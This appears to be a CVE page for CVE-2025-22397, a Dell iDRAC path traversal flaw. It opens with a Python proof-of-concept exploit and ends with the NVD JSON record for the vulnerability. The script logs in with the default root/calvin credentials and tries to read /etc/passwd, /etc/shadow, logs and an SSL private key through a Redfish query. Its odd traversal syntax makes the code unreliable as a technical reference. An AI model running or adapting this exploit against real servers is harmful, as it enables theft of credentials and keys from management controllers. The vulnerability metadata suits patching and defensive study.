CVE-2025-22397

import requests import urllib.parse # CVE-2025-22397 Path Traversal PoC for Dell iDRAC # Target: Dell iDRAC9/iDRAC10 versions prior to patched versions TARGET = "https://<iDRAC-IP>" LOGIN = "root" PASSWORD = "calvin" def exploit_path_traversal(target, session): """ Path traversal exploitation to read arbitrary files from iDRAC filesystem """ # Target files to attempt reading targets = [ "../../../../../../etc/passwd", "../../../../../../etc/shadow", "../../../../../../var/log/messages", "../../../../../../etc/ssl/private/ssl-cert-snakeoil.key" ] headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json" } for target_file in targets: # Try Redfish API endpoint url = f"{target}/redfish/v1/Managers/Self/LogServices/Logs" encoded_path = urllib.parse.quote(target_file) try: # Attempt path traversal via query parameter response = session.get( f"{url}?$expand=.($sigma=*{encoded_path})", headers=headers, verify=False, timeout=10 ) if response.status_code == 200 and len(response.text) > 0: print(f"[+] Successfully read: {target_file}") print(response.text[:500]) else: print(f"[-] Failed to read: {target_file}") except Exception as e: print(f"[!] Error: {e}") def main(): session = requests.Session() # Login to iDRAC login_url = f"{TARGET}/redfish/v1/SessionService/Sessions" payload = {"UserName": LOGIN, "Password": PASSWORD} try: resp = session.post(login_url, json=payload, verify=False) if resp.status_code == 201: print("[+] Login successful") session.headers.update({"X-Auth-Token": resp.headers.get("X-Auth-Token")}) exploit_path_traversal(TARGET, session) else: print("[-] Login failed") except Exception as e: print(f"[!] Connection error: {e}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-22397", "sourceIdentifier": "[email protected]", "published": "2025-11-06T19:15:41.153", "lastModified": "2026-01-21T20:07:45.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Integrated Dell Remote Access Controller 9, 14G versions prior to 7.00.00.181, 15G and 16G versions 6.10.80.00 through 7.20.10.50 and Dell Integrated Dell Remote Access Controller 10, 17G versions prior to 1.20.25.00, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:idrac9_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.10.80.00", "versionEndExcluding": "7.00.00.181", "matchCriteriaId": "AFA88EBF-1790-472B-BCF7-6D0C52AE8FBD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:idrac9_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.00.00.183", "versionEndExcluding": "7.20.10.50", "matchCriteriaId": "5FD8EDE3-C72D-40B8-9260-DC8A00748F0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dell:idrac9:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD8B684E-092F-496C-9D94-51CCD1F3575A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:idrac10_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.20.25.00", "matchCriteriaId": "0362FAE2-88A8-4FB0-B985-BD8FE569D214"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dell:idrac10:-:*:*:*:*:*:*:*", "matchCriteriaId": "5BFCEF7B-7BE5-49C4-9206-C8417174E313"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000384516/dsa-2025-376-security-update-for-dell-idrac9-and-idrac10-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}